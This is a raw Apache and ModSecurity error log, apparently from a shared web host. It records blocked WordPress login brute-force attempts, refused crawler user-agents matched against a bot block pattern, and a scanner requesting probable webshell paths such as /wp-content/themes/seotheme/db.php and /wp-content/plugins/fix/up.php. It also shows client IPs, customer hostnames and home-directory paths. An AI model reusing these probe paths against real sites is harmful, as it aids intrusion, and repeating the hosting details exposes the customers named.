[Tue May 26 19:32:34.392689 2026] [security2:error] [pid 58470:tid 58609] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn-bnjVHRH3AGGvmYFRwAAAAk"]
[Tue May 26 19:32:35.026029 2026] [autoindex:error] [pid 58470:tid 58660] [client 43.128.73.132:60760] AH01276: Cannot serve directory /home1/dprlky8f/dprassurance.lk/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:32:35.118759 2026] [security2:error] [pid 58470:tid 58674] [client 45.131.193.27:20429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.193.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahWn-rnjVHRH3AGGvmYFYAAAAEo"]
[Tue May 26 19:32:35.905183 2026] [security2:error] [pid 58470:tid 58562] [remote 94.76.235.103:33630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWn-7njVHRH3AGGvmYFegAAMVs"]
[Tue May 26 19:32:36.102229 2026] [security2:error] [pid 58470:tid 58626] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn-7njVHRH3AGGvmYFdgAAABo"]
[Tue May 26 19:32:37.065719 2026] [security2:error] [pid 58470:tid 58690] [client 142.132.180.39:15474] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWn_bnjVHRH3AGGvmYFlgAAAFo"], referer: https://thegoodsporting.com
[Tue May 26 19:32:37.116890 2026] [security2:error] [pid 58470:tid 58645] [client 138.219.122.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWn_bnjVHRH3AGGvmYFlwAAAC0"], referer: https://www.anujtradingco.com/
[Tue May 26 19:32:38.199330 2026] [security2:error] [pid 58470:tid 58667] [client 138.219.122.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWn_rnjVHRH3AGGvmYFuwAAAEM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467072&moderation-hash=72f44dbcdc0c737e3cf7427fd1cc1d45
[Tue May 26 19:32:38.489186 2026] [security2:error] [pid 58470:tid 58574] [remote 216.73.216.30:44720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWn_rnjVHRH3AGGvmYFywAAP2c"]
[Tue May 26 19:32:38.690009 2026] [security2:error] [pid 58470:tid 58633] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn_rnjVHRH3AGGvmYFygAAACE"]
[Tue May 26 19:32:39.292582 2026] [security2:error] [pid 58470:tid 58578] [remote 74.7.241.58:33808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWn_7njVHRH3AGGvmYF5QAAU2s"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes
[Tue May 26 19:32:39.405042 2026] [security2:error] [pid 58470:tid 58627] [client 20.64.104.20:39148] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "207.174.214.47"] [uri "/cgi-sys/404.html"] [unique_id "ahWn_7njVHRH3AGGvmYF7AAAABs"]
[Tue May 26 19:32:40.302904 2026] [security2:error] [pid 58470:tid 58678] [client 216.244.66.241:51660] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/avalvularcefd/ddcbfd1514209.shtml"] [unique_id "ahWoALnjVHRH3AGGvmYGBgAAAE4"]
[Tue May 26 19:32:40.303021 2026] [security2:error] [pid 58470:tid 58678] [client 216.244.66.241:51660] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/avalvularcefd/ddcbfd1514209.shtml"] [unique_id "ahWoALnjVHRH3AGGvmYGBgAAAE4"]
[Tue May 26 19:32:40.692701 2026] [security2:error] [pid 58470:tid 58689] [client 138.219.122.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWoALnjVHRH3AGGvmYGFQAAAFk"], referer: https://anujtradingco.com
[Tue May 26 19:32:40.955501 2026] [security2:error] [pid 58470:tid 58600] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoALnjVHRH3AGGvmYGDwAAAAA"]
[Tue May 26 19:32:41.289005 2026] [security2:error] [pid 58470:tid 58580] [remote 194.213.4.139:42796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWoAbnjVHRH3AGGvmYGJwAAf20"]
[Tue May 26 19:32:41.639707 2026] [security2:error] [pid 58470:tid 58589] [remote 194.213.4.139:42796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWoAbnjVHRH3AGGvmYGNQAAFnY"], referer: https://hassina-foundation.com/wp-login.php
[Tue May 26 19:32:41.739943 2026] [security2:error] [pid 58470:tid 58494] [remote 217.112.89.35:59598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoAbnjVHRH3AGGvmYGNAAAShc"]
[Tue May 26 19:32:43.024999 2026] [security2:error] [pid 58470:tid 58671] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoArnjVHRH3AGGvmYGVgAAAEc"]
[Tue May 26 19:32:44.553289 2026] [security2:error] [pid 58470:tid 58630] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoBLnjVHRH3AGGvmYGiAAAAB4"]
[Tue May 26 19:32:44.643897 2026] [security2:error] [pid 58470:tid 58647] [client 185.102.112.42:21225] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "restmoll.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWoBLnjVHRH3AGGvmYGmwAAAC8"]
[Tue May 26 19:32:44.697563 2026] [security2:error] [pid 58470:tid 58673] [client 45.154.98.236:63429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWoBLnjVHRH3AGGvmYGnwAAAEk"]
[Tue May 26 19:32:44.715059 2026] [security2:error] [pid 58470:tid 58705] [client 45.154.98.236:63437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWoBLnjVHRH3AGGvmYGoQAAAGk"], referer: www.google.com
[Tue May 26 19:32:44.719257 2026] [security2:error] [pid 58470:tid 58659] [client 45.154.98.236:63435] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-plain.php"] [unique_id "ahWoBLnjVHRH3AGGvmYGowAAADs"], referer: www.google.com
[Tue May 26 19:32:44.871603 2026] [core:error] [pid 58470:tid 58722] (104)Connection reset by peer: [client 45.154.98.236:63431] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:32:45.011520 2026] [security2:error] [pid 58470:tid 58721] [client 45.154.98.236:60685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/xplsfdjk.php"] [unique_id "ahWoBbnjVHRH3AGGvmYGrwAAAHk"], referer: www.google.com
[Tue May 26 19:32:45.144378 2026] [security2:error] [pid 58470:tid 58481] [remote 193.42.61.12:51218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoBLnjVHRH3AGGvmYGrgAAIQo"]
[Tue May 26 19:32:45.201457 2026] [security2:error] [pid 58470:tid 58652] [client 45.154.98.236:59659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWoBbnjVHRH3AGGvmYGuQAAADQ"], referer: www.google.com
[Tue May 26 19:32:45.205241 2026] [security2:error] [pid 58470:tid 58714] [client 216.244.66.241:53590] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/cryaesthesiaaccc/faefcf1610335.shtml"] [unique_id "ahWoBbnjVHRH3AGGvmYGugAAAHI"]
[Tue May 26 19:32:45.205344 2026] [security2:error] [pid 58470:tid 58714] [client 216.244.66.241:53590] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/cryaesthesiaaccc/faefcf1610335.shtml"] [unique_id "ahWoBbnjVHRH3AGGvmYGugAAAHI"]
[Tue May 26 19:32:45.505275 2026] [security2:error] [pid 58470:tid 58676] [client 45.154.98.236:51307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-plain.php"] [unique_id "ahWoBbnjVHRH3AGGvmYGvwAAAEw"], referer: www.google.com
[Tue May 26 19:32:45.952220 2026] [security2:error] [pid 58470:tid 58713] [client 45.154.98.236:58744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/qrsqdguq.php"] [unique_id "ahWoBbnjVHRH3AGGvmYG5gAAAHE"], referer: www.google.com
[Tue May 26 19:32:47.348893 2026] [security2:error] [pid 58470:tid 58727] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoBrnjVHRH3AGGvmYG_wAAAH8"]
[Tue May 26 19:32:48.155050 2026] [security2:error] [pid 58470:tid 58713] [client 178.62.95.212:58258] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahWoCLnjVHRH3AGGvmYHFwAAAHE"], referer: http://deeigo.com/
[Tue May 26 19:32:48.501492 2026] [security2:error] [pid 58470:tid 58518] [remote 216.73.216.30:48416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWoCLnjVHRH3AGGvmYHJQAAey8"]
[Tue May 26 19:32:49.305458 2026] [security2:error] [pid 58470:tid 58642] [client 216.244.66.241:53592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/hulstereecd/ceccde1362425.shtml"] [unique_id "ahWoCbnjVHRH3AGGvmYHMwAAACo"]
[Tue May 26 19:32:49.305662 2026] [security2:error] [pid 58470:tid 58642] [client 216.244.66.241:53592] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/hulstereecd/ceccde1362425.shtml"] [unique_id "ahWoCbnjVHRH3AGGvmYHMwAAACo"]
[Tue May 26 19:32:49.644992 2026] [security2:error] [pid 58470:tid 58683] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoCbnjVHRH3AGGvmYHMgAAAFM"]
[Tue May 26 19:32:50.200183 2026] [core:error] [pid 58470:tid 58663] (104)Connection reset by peer: [client 45.154.98.236:58599] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:32:51.631948 2026] [security2:error] [pid 58470:tid 58609] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoC7njVHRH3AGGvmYHYQAAAAk"]
[Tue May 26 19:32:52.156960 2026] [autoindex:error] [pid 58470:tid 58601] [client 146.19.78.147:30411] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:32:52.157686 2026] [security2:error] [pid 58470:tid 58601] [client 146.19.78.147:30411] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "403"] [hostname "restmoll.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWoDLnjVHRH3AGGvmYHfQAAAAE"]
[Tue May 26 19:32:52.305065 2026] [security2:error] [pid 58470:tid 58612] [client 85.208.96.193:10698] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWoDLnjVHRH3AGGvmYHfgAAAAw"]
[Tue May 26 19:32:52.305278 2026] [security2:error] [pid 58470:tid 58612] [client 85.208.96.193:10698] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWoDLnjVHRH3AGGvmYHfgAAAAw"]
[Tue May 26 19:32:52.393286 2026] [security2:error] [pid 58470:tid 58600] [client 20.221.66.74:55796] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.199.245"] [uri "/index.cgi"] [unique_id "ahWoDLnjVHRH3AGGvmYHgwAAAAA"]
[Tue May 26 19:32:53.189388 2026] [security2:error] [pid 58470:tid 58638] [client 178.62.95.212:41778] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahWoDbnjVHRH3AGGvmYHngAAACY"], referer: https://deeigo.com/
[Tue May 26 19:32:53.875561 2026] [security2:error] [pid 58470:tid 58614] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoDbnjVHRH3AGGvmYHrAAAAA4"]
[Tue May 26 19:32:55.498577 2026] [security2:error] [pid 58470:tid 58683] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoD7njVHRH3AGGvmYH6AAAAFM"]
[Tue May 26 19:32:55.608243 2026] [core:error] [pid 58470:tid 58694] (104)Connection reset by peer: [client 45.154.98.236:54424] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:32:55.735770 2026] [security2:error] [pid 58470:tid 58549] [remote 217.112.89.35:41912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoD7njVHRH3AGGvmYH-AAAM04"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:32:57.617635 2026] [security2:error] [pid 58470:tid 58715] [client 88.180.24.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoEbnjVHRH3AGGvmYIGwAAAHM"]
[Tue May 26 19:32:57.799288 2026] [autoindex:error] [pid 58470:tid 58710] [client 66.132.186.175:47678] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:32:58.140043 2026] [security2:error] [pid 58470:tid 58712] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoEbnjVHRH3AGGvmYIKgAAAHA"]
[Tue May 26 19:32:58.981536 2026] [security2:error] [pid 58470:tid 58629] [client 114.119.153.208:44873] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahWoErnjVHRH3AGGvmYIVgAAAB0"]
[Tue May 26 19:32:59.867815 2026] [security2:error] [pid 58470:tid 58638] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoE7njVHRH3AGGvmYIYQAAACY"]
[Tue May 26 19:33:00.954819 2026] [core:error] [pid 58470:tid 58649] (104)Connection reset by peer: [client 45.154.98.236:56082] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:33:01.118323 2026] [security2:error] [pid 58470:tid 58690] [client 34.53.252.202:35548] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.199.245"] [uri "/"] [unique_id "ahWoFbnjVHRH3AGGvmYIjwAAAFo"]
[Tue May 26 19:33:01.180200 2026] [security2:error] [pid 58470:tid 58536] [remote 123.30.233.13:60512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWoFbnjVHRH3AGGvmYIiwAAKUE"]
[Tue May 26 19:33:01.686065 2026] [security2:error] [pid 58470:tid 58718] [client 116.204.44.63:57048] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWoDrnjVHRH3AGGvmYH2AAAdjw"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 19:33:02.363651 2026] [security2:error] [pid 58470:tid 58605] [client 173.239.240.37:56555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWoFrnjVHRH3AGGvmYIrgAAAAU"]
[Tue May 26 19:33:02.372338 2026] [security2:error] [pid 58470:tid 58539] [remote 173.249.15.100:38978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWoFrnjVHRH3AGGvmYItAAAFkQ"]
